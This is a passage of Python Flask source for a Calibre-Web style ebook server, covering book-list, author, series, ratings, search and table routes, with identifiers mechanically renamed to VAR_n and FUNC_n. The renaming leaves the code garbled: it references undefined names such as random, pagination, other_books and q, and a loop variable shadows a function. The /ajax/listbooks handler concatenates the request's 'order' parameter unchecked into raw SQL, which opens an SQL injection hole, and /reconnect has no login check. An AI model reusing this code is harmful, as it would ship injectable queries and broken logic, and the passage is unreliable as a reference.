            VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            VAR_68 = false()
        VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9,
                                                           0,
                                                           db.Books,
                                                           ub.Downloads.user_id == VAR_11,
                                                           VAR_10,
                                                           ub.Downloads, db.Books.id == ub.Downloads.book_id)
        for VAR_95 in VAR_63:
            # Remove download entries whose book no longer exists / is hidden.
            if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                    .filter(db.Books.id == VAR_95.id).first():
                ub.delete_download(VAR_95.id)
        VAR_104 = ub.session.query(ub.User).filter(ub.User.id == VAR_11).first()
        return render_title_template('index.html',
                                     VAR_68=random,
                                     VAR_63=VAR_63,
                                     VAR_65=pagination,
                                     id=VAR_11,
                                     VAR_149=_(u"Downloaded VAR_127 by %(VAR_104)s", VAR_104=VAR_104.name),
                                     VAR_9="download")
    else:
        abort(404)
def FUNC_20(VAR_9, VAR_12, VAR_10):
    """Render page VAR_9 of books by author id VAR_12, optionally enriched with
    Goodreads author info when the integration is configured."""
    VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.authors.any(db.Authors.id == VAR_12),
                                                       [VAR_10[0], db.Series.name, db.Books.series_index],
                                                       db.books_series_link,
                                                       db.Books.id == db.books_series_link.c.book,
                                                       db.Series)
    if VAR_63 is None or not len(VAR_63):
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
    # SQLAlchemy 2.x replaced Query.get() with Session.get().
    if constants.sqlalchemy_version2:
        VAR_105 = calibre_db.session.get(db.Authors, VAR_12)
    else:
        VAR_105 = calibre_db.session.query(db.Authors).get(VAR_12)
    # Calibre stores authors as "Last| First"; display with a comma.
    VAR_36 = VAR_105.name.replace('|', ',')
    VAR_66 = None
    VAR_67 = []
    if services.goodreads_support and config.config_use_goodreads:
        VAR_66 = services.goodreads_support.get_author_info(VAR_36)
        VAR_67 = services.goodreads_support.get_other_books(VAR_66, VAR_63)
    # NOTE(review): `other_books` is passed instead of the local VAR_67 — renaming artifact?
    return render_title_template('author.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_12,
                                 VAR_149=_(u"Author: %(VAR_13)s", VAR_13=VAR_36), VAR_105=VAR_66,
                                 VAR_67=other_books, VAR_9="author")
def FUNC_21(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of books for publisher id VAR_5; 404 if the publisher
    does not exist."""
    VAR_38 = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == VAR_5).first()
    if VAR_38:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.publishers.any(db.Publishers.id == VAR_5),
                                                           [db.Series.name, VAR_10[0], db.Books.series_index],
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
                                     VAR_149=_(u"Publisher: %(VAR_13)s", VAR_13=VAR_38.name), VAR_9="publisher")
    else:
        abort(404)
def FUNC_22(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of books in series id VAR_5; 404 if the series is unknown."""
    VAR_13 = calibre_db.session.query(db.Series).filter(db.Series.id == VAR_5).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.series.any(db.Series.id == VAR_5),
                                                           [VAR_10[0]])
        return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"Series: %(serie)s", serie=VAR_13.name), VAR_9="series")
    else:
        abort(404)
def FUNC_23(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of books with rating id VAR_5.

    Calibre stores ratings 0-10; the title shows half of that (stars out of 5).
    404s for unknown or out-of-range ratings.
    """
    VAR_13 = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == VAR_5).first()
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.ratings.any(db.Ratings.id == VAR_5),
                                                       [VAR_10[0]])
    if VAR_13 and VAR_13.rating <= 10:
        return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"Rating: %(rating)s stars", rating=int(VAR_13.rating / 2)), VAR_9="ratings")
    else:
        abort(404)
def FUNC_24(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of books available in file format VAR_5 (case-insensitive);
    404 if no book has that format."""
    VAR_13 = calibre_db.session.query(db.Data).filter(db.Data.format == VAR_5.upper()).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.data.any(db.Data.format == VAR_5.upper()),
                                                           [VAR_10[0]])
        return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"File format: %(format)s", format=VAR_13.format), VAR_9="formats")
    else:
        abort(404)
def FUNC_25(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of books tagged with category (tag) id VAR_5;
    404 if the tag does not exist."""
    VAR_13 = calibre_db.session.query(db.Tags).filter(db.Tags.id == VAR_5).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.tags.any(db.Tags.id == VAR_5),
                                                           [VAR_10[0], db.Series.name, db.Books.series_index],
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
                                     VAR_149=_(u"Category: %(VAR_13)s", VAR_13=VAR_13.name), VAR_9="category")
    else:
        abort(404)
def FUNC_26(VAR_9, VAR_13, VAR_10):
    """Render page VAR_9 of books in language code VAR_13; 404 for unknown codes."""
    try:
        # Translate the ISO language code into a localized display name.
        VAR_106 = isoLanguages.get_language_name(get_locale(), VAR_13)
    except KeyError:
        abort(404)
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.languages.any(db.Languages.lang_code == VAR_13),
                                                       [VAR_10[0]])
    return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_13,
                                 VAR_149=_(u"Language: %(VAR_13)s", VAR_13=VAR_106), VAR_9="language")
def FUNC_27(VAR_9, VAR_14, VAR_15=False, VAR_10=None):
    """Render page VAR_9 of read (VAR_14=True) or unread (VAR_14=False) books.

    Read state comes either from the app's own ReadBook table or, when
    config_read_column is set, from a boolean custom column in the Calibre DB.
    With VAR_15 truthy the raw (entries, pagination) pair is returned instead of
    a rendered page (used for feed output).
    """
    VAR_10 = VAR_10 or []
    if not config.config_read_column:
        # Internal read-status tracking (per-user ReadBook rows).
        if VAR_14:
            VAR_126 = and_(ub.ReadBook.user_id == int(VAR_87.id),
                           ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
        else:
            # Missing rows count as unread, hence the coalesce to 0.
            VAR_126 = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           VAR_126,
                                                           VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series,
                                                           ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
    else:
        # Read status is mirrored in a Calibre custom column.
        try:
            if VAR_14:
                VAR_126 = db.cc_classes[config.config_read_column].value == True
            else:
                VAR_126 = coalesce(db.cc_classes[config.config_read_column].value, False) != True
            VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                               db.Books,
                                                               VAR_126,
                                                               VAR_10,
                                                               db.books_series_link,
                                                               db.Books.id == db.books_series_link.c.book,
                                                               db.Series,
                                                               db.cc_classes[config.config_read_column])
        except (KeyError, AttributeError):
            # The configured custom column vanished from the Calibre DB.
            VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
            if not VAR_15:
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
            return redirect(url_for("web.index"))
    if VAR_15:
        return VAR_63, VAR_65
    else:
        if VAR_14:
            VAR_13 = _(u'Read Books') + ' (' + str(VAR_65.total_count) + ')'
            VAR_72 = "read"
        else:
            VAR_13 = _(u'Unread Books') + ' (' + str(VAR_65.total_count) + ')'
            VAR_72 = "unread"
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
                                     VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_28(VAR_9, VAR_10):
    """Render page VAR_9 of the current user's archived books."""
    VAR_10 = VAR_10 or []
    # Ids of every book this user archived.
    VAR_69 = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.user_id == int(VAR_87.id))
        .filter(ub.ArchivedBook.is_archived == True)
        .all()
    )
    VAR_70 = [VAR_54.book_id for VAR_54 in VAR_69]
    VAR_71 = db.Books.id.in_(VAR_70)
    # Archived books are normally hidden; explicitly allow them here.
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage_with_archived_books(VAR_9, 0,
                                                                           db.Books,
                                                                           VAR_71,
                                                                           VAR_10,
                                                                           allow_show_archived=True)
    VAR_13 = _(u'Archived Books') + ' (' + str(len(VAR_70)) + ')'
    VAR_72 = "archived"
    return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
                                 VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_29(VAR_16):
    """Render the advanced-search form, pre-populated with every selectable
    tag, series, shelf, file format and (optionally) language.

    VAR_16 is the list of custom columns to expose as extra search fields.
    """
    VAR_41 = calibre_db.session.query(db.Tags)\
        .join(db.books_tags_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_tags_link.tag'))\
        .order_by(db.Tags.name).all()
    VAR_73 = calibre_db.session.query(db.Series)\
        .join(db.books_series_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_series_link.series'))\
        .order_by(db.Series.name)\
        .filter(calibre_db.common_filters()).all()
    # Shelves visible to this user: public ones plus their own.
    VAR_74 = ub.session.query(ub.Shelf)\
        .filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(VAR_87.id)))\
        .order_by(ub.Shelf.name).all()
    VAR_75 = calibre_db.session.query(db.Data)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(db.Data.format)\
        .order_by(db.Data.format).all()
    if VAR_87.filter_language() == u"all":
        VAR_48 = calibre_db.speaking_language()
    else:
        # Language pre-filtered per user: no language selector needed.
        VAR_48 = None
    return render_title_template('search_form.html', VAR_41=tags, VAR_48=languages, VAR_75=extensions,
                                 VAR_73=series, VAR_74=shelves, VAR_149=_(u"Advanced Search"), VAR_16=cc, VAR_9="advsearch")
def FUNC_30(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
    """Run a simple full-text search for VAR_17 and render the result page.

    VAR_18 is the result offset, VAR_10 the order-by list, VAR_19 the page size.
    """
    # Outer-join series so results can be ordered/displayed with series info.
    VAR_76 = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    VAR_63, VAR_77, VAR_65 = calibre_db.get_search_results(VAR_17, VAR_18, VAR_10, VAR_19, *VAR_76)
    return render_title_template('search.html',
                                 VAR_35=VAR_17,
                                 VAR_65=pagination,
                                 VAR_56=VAR_17,
                                 adv_searchterm=VAR_17,
                                 VAR_63=entries,
                                 VAR_77=result_count,
                                 VAR_149=_(u"Search"),
                                 VAR_9="search")
@VAR_2.route("/", defaults={'page': 1})
@VAR_2.route('/VAR_9/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_31(VAR_9):
    """Index route: show page VAR_9 of the newest books, honoring the
    optional ?sort= query parameter (defaults to the stored preference)."""
    VAR_20 = (request.args.get('sort') or 'stored').lower()
    return FUNC_15("newest", VAR_20, 1, VAR_9)
@VAR_2.route('/<VAR_8>/<VAR_20>', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>', defaults={'page': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_32(VAR_8, VAR_20, VAR_5, VAR_9):
    """Generic list route: /<data source>/<sort>/<id>/<page>, delegating
    straight to the list dispatcher."""
    return FUNC_15(VAR_8, VAR_20, VAR_5, VAR_9)
@VAR_2.route("/table")
@login_required
def FUNC_33():
    """Render the tabular books-list view with the user's saved column
    visibility settings."""
    VAR_78 = VAR_87.view_settings.get('table', {})
    return render_title_template('book_table.html', VAR_149=_(u"Books List"), VAR_9="book_table",
                                 visiblility=VAR_78)
@VAR_2.route("/ajax/listbooks")
@login_required
def FUNC_34():
    """AJAX endpoint backing the book table: returns a JSON page of books.

    Supports offset/limit paging, free-text search, per-column sorting
    (including sorts requiring joins on tags/series/publishers/authors/
    languages) and a client-supplied checkbox "state" for custom ordering.
    """
    VAR_79 = int(request.args.get("offset") or 0)
    VAR_19 = int(request.args.get("limit") or config.config_books_per_page)
    VAR_80 = request.args.get("search")
    VAR_7 = request.args.get("sort", "id")
    VAR_10 = request.args.get("order", "").lower()
    VAR_81 = None
    VAR_76 = tuple()  # extra join targets needed by the chosen sort column
    if VAR_7 == "state":
        VAR_81 = json.loads(request.args.get("state", "[]"))
    elif VAR_7 == "tags":
        VAR_10 = [db.Tags.name.asc()] if VAR_10 == "asc" else [db.Tags.name.desc()]
        VAR_76 = db.books_tags_link, db.Books.id == db.books_tags_link.c.book, db.Tags
    elif VAR_7 == "series":
        VAR_10 = [db.Series.name.asc()] if VAR_10 == "asc" else [db.Series.name.desc()]
        VAR_76 = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    elif VAR_7 == "publishers":
        VAR_10 = [db.Publishers.name.asc()] if VAR_10 == "asc" else [db.Publishers.name.desc()]
        VAR_76 = db.books_publishers_link, db.Books.id == db.books_publishers_link.c.book, db.Publishers
    elif VAR_7 == "authors":
        VAR_10 = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if VAR_10 == "asc" \
            else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
        VAR_76 = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
                 db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    elif VAR_7 == "languages":
        VAR_10 = [db.Languages.lang_code.asc()] if VAR_10 == "asc" else [db.Languages.lang_code.desc()]
        VAR_76 = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
    elif VAR_10 and VAR_7 in ["sort", "title", "authors_sort", "series_index"]:
        # Plain column sorts need no extra join; build raw "col dir" SQL text.
        VAR_10 = [text(VAR_7 + " " + VAR_10)]
    elif not VAR_81:
        VAR_10 = [db.Books.timestamp.desc()]
    VAR_82 = VAR_83 = calibre_db.session.query(db.Books).count()
    if VAR_81:
        if VAR_80:
            VAR_127 = calibre_db.search_query(VAR_80).all()
            VAR_83 = len(VAR_127)
        else:
            VAR_127 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
        VAR_63 = calibre_db.get_checkbox_sorted(VAR_127, VAR_81, VAR_79, VAR_19, VAR_10)
    elif VAR_80:
        VAR_63, VAR_83, VAR_64 = calibre_db.get_search_results(VAR_80, VAR_79, VAR_10, VAR_19, *VAR_76)
    else:
        VAR_63, VAR_64, VAR_64 = calibre_db.fill_indexpage((int(VAR_79) / (int(VAR_19)) + 1), VAR_19, db.Books, True, VAR_10, *VAR_76)
    # NOTE(review): the inner loop variable shadows route function FUNC_31 —
    # harmless at runtime inside this scope, but a renaming artifact worth fixing.
    for entry in VAR_63:
        for FUNC_31 in range(0, len(entry.languages)):
            entry.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
                FUNC_31].lang_code)
    VAR_84 = {'totalNotFiltered': VAR_82, 'total': VAR_83, "rows": VAR_63}
    VAR_85 = json.dumps(VAR_84, cls=db.AlchemyEncoder)
    VAR_86 = make_response(VAR_85)
    VAR_86.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_86
@VAR_2.route("/ajax/table_settings", methods=['POST'])
@login_required
def FUNC_35():
    """Persist the user's book-table column settings posted as JSON."""
    VAR_87.view_settings['table'] = json.loads(request.data)
    try:
        try:
            # Mutating a JSON column in place is invisible to SQLAlchemy;
            # flag it dirty explicitly so the commit picks it up.
            flag_modified(VAR_87, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        VAR_3.error("Invalid request received: %r ", request, )
        return "Invalid request", 400
    return ""
@VAR_2.route("/author")
@login_required_if_no_ano
def FUNC_36():
    """Render the author overview: every visible author with their book count
    plus an initial-letter index for navigation."""
    if VAR_87.check_visibility(constants.SIDEBAR_AUTHOR):
        if VAR_87.get_view_property('author', 'dir') == 'desc':
            VAR_10 = db.Authors.sort.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Authors.sort.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_authors_link.author')).order_by(VAR_10).all()
        # Distinct first letters of the sort names, for the A-Z jump list.
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
        # Deep-copy before rewriting names so the ORM objects stay untouched.
        VAR_108 = copy.deepcopy(VAR_63)
        for entry in VAR_108:
            entry.Authors.name = entry.Authors.name.replace('|', ',')
        return render_title_template('list.html', VAR_63=VAR_108, folder='web.books_list', VAR_107=charlist,
                                     VAR_149=u"Authors", VAR_9="authorlist", VAR_8='author', VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/downloadlist")
@login_required_if_no_ano
def FUNC_37():
    """Render the per-user download statistics list (admins only), with an
    initial-letter index excluding the anonymous role."""
    if VAR_87.get_view_property('download', 'dir') == 'desc':
        VAR_10 = ub.User.name.desc()
        VAR_109 = 0
    else:
        VAR_10 = ub.User.name.asc()
        VAR_109 = 1
    if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD) and VAR_87.role_admin():
        VAR_63 = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
            .join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(VAR_10).all()
        VAR_107 = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
            .filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
            .group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
                                     VAR_149=_(u"Downloads"), VAR_9="downloadlist", VAR_8="download", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/publisher")
@login_required_if_no_ano
def FUNC_38():
    """Render the publisher overview with per-publisher book counts and an
    initial-letter index."""
    if VAR_87.get_view_property('publisher', 'dir') == 'desc':
        VAR_10 = db.Publishers.name.desc()
        VAR_109 = 0
    else:
        VAR_10 = db.Publishers.name.asc()
        VAR_109 = 1
    if VAR_87.check_visibility(constants.SIDEBAR_PUBLISHER):
        VAR_63 = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_publishers_link.publisher')).order_by(VAR_10).all()
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
                                     VAR_149=_(u"Publishers"), VAR_9="publisherlist", VAR_8="publisher", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/series")
@login_required_if_no_ano
def FUNC_39():
    """Render the series overview, as either a flat list or a cover grid
    depending on the user's series_view preference."""
    if VAR_87.check_visibility(constants.SIDEBAR_SERIES):
        if VAR_87.get_view_property('series', 'dir') == 'desc':
            VAR_10 = db.Series.sort.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Series.sort.asc()
            VAR_109 = 1
        if VAR_87.get_view_property('series', 'series_view') == 'list':
            VAR_63 = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(VAR_10).all()
            VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
                                         VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series")
        else:
            # Grid view: one representative Book row per series (for the cover).
            VAR_63 = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
                .join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(VAR_10).all()
            VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            return render_title_template('grid.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
                                         VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series", bodyClass="grid-view",
                                         VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/ratings")
@login_required_if_no_ano
def FUNC_40():
    """Render the ratings overview: each rating value (halved to a star count)
    with the number of books carrying it."""
    if VAR_87.check_visibility(constants.SIDEBAR_RATING):
        if VAR_87.get_view_property('ratings', 'dir') == 'desc':
            VAR_10 = db.Ratings.rating.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Ratings.rating.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
                                          (db.Ratings.rating / 2).label('name')) \
            .join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_ratings_link.rating')).order_by(VAR_10).all()
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
                                     VAR_149=_(u"Ratings list"), VAR_9="ratingslist", VAR_8="ratings", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/formats")
@login_required_if_no_ano
def FUNC_41():
    """Render the file-format overview with a per-format book count.

    NOTE(review): the sort direction is read from the 'ratings' view property,
    not 'formats' — presumably a copy/paste slip carried over; confirm intent.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_FORMAT):
        if VAR_87.get_view_property('ratings', 'dir') == 'desc':
            VAR_10 = db.Data.format.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Data.format.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Data,
                                          func.count('data.book').label('count'),
                                          db.Data.format.label('format')) \
            .join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(db.Data.format).order_by(VAR_10).all()
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
                                     VAR_149=_(u"File formats list"), VAR_9="formatslist", VAR_8="formats", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/language")
@login_required_if_no_ano
def FUNC_42():
    """Render the language overview with per-language book counts.

    Users restricted to a single language only see that one entry.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_LANGUAGE):
        VAR_107 = list()
        if VAR_87.filter_language() == u"all":
            VAR_48 = calibre_db.speaking_language()
        else:
            VAR_48 = calibre_db.session.query(db.Languages).filter(
                db.Languages.lang_code == VAR_87.filter_language()).all()
            VAR_48[0].name = isoLanguages.get_language_name(get_locale(), VAR_48[0].name.lang_code)
        VAR_110 = calibre_db.session.query(db.books_languages_link,
                                           func.count('books_languages_link.book').label('bookcount')).group_by(
            text('books_languages_link.lang_code')).all()
        return render_title_template('languages.html', VAR_48=languages, VAR_110=lang_counter,
                                     VAR_107=charlist, VAR_149=_(u"Languages"), VAR_9="langlist",
                                     VAR_8="language")
    else:
        abort(404)
@VAR_2.route("/category")
@login_required_if_no_ano
def FUNC_43():
    """Render the category (tag) overview with per-tag book counts and an
    initial-letter index."""
    if VAR_87.check_visibility(constants.SIDEBAR_CATEGORY):
        if VAR_87.get_view_property('category', 'dir') == 'desc':
            VAR_10 = db.Tags.name.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Tags.name.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
            .join(db.books_tags_link).join(db.Books).order_by(VAR_10).filter(calibre_db.common_filters()) \
            .group_by(text('books_tags_link.tag')).all()
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
            .join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
                                     VAR_149=_(u"Categories"), VAR_9="catlist", VAR_8="category", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/tasks")
@login_required
def FUNC_44():
    """Render the background-task status page from the worker thread's task list."""
    VAR_51 = WorkerThread.getInstance().tasks
    VAR_88 = render_task_status(VAR_51)
    return render_title_template('tasks.html', VAR_63=VAR_88, VAR_149=_(u"Tasks"), VAR_9="tasks")
@app.route("/reconnect")
def FUNC_45():
    """Force a reconnect of the Calibre database (e.g. after an external
    tool swapped the metadata.db). Returns an empty JSON object."""
    calibre_db.reconnect_db(config, ub.app_DB_path)
    return json.dumps({})
@VAR_2.route("/search", methods=["GET"])
@login_required_if_no_ano
def VAR_80():
    """Simple-search route: redirect a non-empty ?query= to the paged search
    list, otherwise render an empty search page."""
    VAR_17 = request.args.get("query")
    if VAR_17:
        return redirect(url_for('web.books_list', VAR_8="search", VAR_20='stored', VAR_56=VAR_17))
    else:
        return render_title_template('search.html',
                                     VAR_35="",
                                     VAR_77=0,
                                     VAR_149=_(u"Search"),
                                     VAR_9="search")
@VAR_2.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def FUNC_47():
    """Advanced-search POST handler: normalize the form (multi-select fields
    become lists), stash it as JSON, and redirect to the paged result list."""
    VAR_89 = dict(request.form)
    VAR_90 = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie', 'include_shelf', 'exclude_shelf',
              'include_language', 'exclude_language', 'include_extension', 'exclude_extension']
    for VAR_111 in VAR_90:
        # dict(request.form) keeps only the first value; re-read as lists.
        VAR_89[VAR_111] = list(request.form.getlist(VAR_111))
    VAR_91['query'] = json.dumps(VAR_89)
    return redirect(url_for('web.books_list', VAR_8="advsearch", VAR_20='stored', VAR_56=""))
def FUNC_48(VAR_16, VAR_17, VAR_21):
    """Apply custom-column search terms from form data VAR_17 to query VAR_21.

    Datetime columns use start/end range fields; bool/int/float/rating columns
    use exact match (ratings are entered as stars, stored doubled); everything
    else falls back to a case-insensitive substring match.
    NOTE(review): the body chains onto `q`, not the parameter VAR_21 — renaming
    artifact; confirm both refer to the same query object.
    """
    for c in VAR_16:
        if c.datatype == "datetime":
            VAR_128 = VAR_17.get('custom_column_' + str(c.id) + '_start')
            VAR_129 = VAR_17.get('custom_column_' + str(c.id) + '_end')
            if VAR_128:
                VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) >= func.datetime(VAR_128)))
            if VAR_129:
                VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) <= func.datetime(VAR_129)))
        else:
            VAR_130 = VAR_17.get('custom_column_' + str(c.id))
            if VAR_130 != '' and VAR_130 is not None:
                if c.datatype == 'bool':
                    VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == (VAR_130 == "True")))
                elif c.datatype == 'int' or c.datatype == 'float':
                    VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == VAR_130))
                elif c.datatype == 'rating':
                    # Stars entered by the user; Calibre stores rating * 2.
                    VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == int(float(VAR_130) * 2)))
                else:
                    VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        func.lower(db.cc_classes[c.id].value).ilike("%" + VAR_130 + "%")))
    return VAR_21
def FUNC_49(VAR_21, VAR_22, VAR_23):
